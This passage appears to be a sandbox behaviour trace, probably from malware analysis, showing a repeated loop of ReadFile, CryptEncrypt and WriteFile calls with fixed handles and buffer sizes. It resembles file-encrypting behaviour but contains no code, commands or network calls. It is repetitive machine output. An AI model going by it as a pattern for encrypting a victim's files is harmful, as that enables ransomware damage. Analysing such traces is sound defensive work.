lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.036] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.036] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.036] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.036] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.036] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.036] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.036] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.036] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.036] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.036] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.036] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.036] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.036] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.036] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.036] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.037] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.037] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.037] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.037] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.037] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.037] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.037] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.037] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.037] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.037] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.037] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.037] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.037] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.038] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.038] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.038] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.038] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.038] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.038] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.038] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.038] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.038] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.038] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.038] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.038] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.038] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.038] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.038] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.038] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.038] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.039] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.039] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.039] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.039] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.039] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.039] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.039] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.208] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.208] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.209] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.209] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.209] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.209] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.211] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.211] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.211] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.211] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.211] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.211] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.211] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.211] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.211] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.211] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.211] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.211] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.212] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.212] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.212] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.212] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.212] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.212] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.212] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.212] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.212] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.212] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.212] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.212] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.212] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.212] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.213] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.213] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.213] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.213] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.213] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.213] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.213] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.213] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.213] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.213] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.213] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.213] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.213] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.213] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.213] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.214] 